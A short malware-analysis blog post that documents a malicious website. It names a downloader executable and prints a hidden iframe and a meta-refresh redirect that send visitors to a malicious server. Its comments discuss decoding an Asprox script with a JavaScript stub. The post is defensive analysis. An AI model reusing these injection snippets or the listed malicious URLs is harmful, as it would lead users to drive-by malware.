www.ok2bstr8.com/index_13.html

the URL contains links to http://www.ok2bstr8.com/view.exe

view.exe is a downloader – VT analysis

The URL also has an iframe embedded:

<iframe id=”01″ src=”2.html” frameborder=”0″ style=”display:none”></iframe>

2.html links to malicious obfuscated JS:

<meta http-equiv=”refresh” content=”2;URL=http://79.135.167.18/cgi-bin/index.cgi?user2″>

The above IP is associated with many domains such as minimal345.com

Advertisements

2 Responses to “www.ok2bstr8.com/index_13.html”

  1. Hello, wondering if you’ve been able to decode the new script being used by asprox. Sample @ http://92prt.ru/cgi-bin/index.cgi?script

    I have not been able to do so using spider monkey wondering if you’ve done some analysis on this before.

    Thanks,

  2. first, strip html entities off the “index.cgi?script” content.

    second, create a stub file, stub.js, with the following contents:
    function eval(a) {print(a);}
    location = new Object();
    location.href = “http://92prt.ru/cgi-bin/index.cgi?script”;
    document= new Object();
    document = {write:print};
    navigator = new Object();
    navigator.appMinorVersion = “;SP2;”
    navigator.systemLanguage = “en-us”

    then issue command “js -f stub.js index.cgi\?script”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: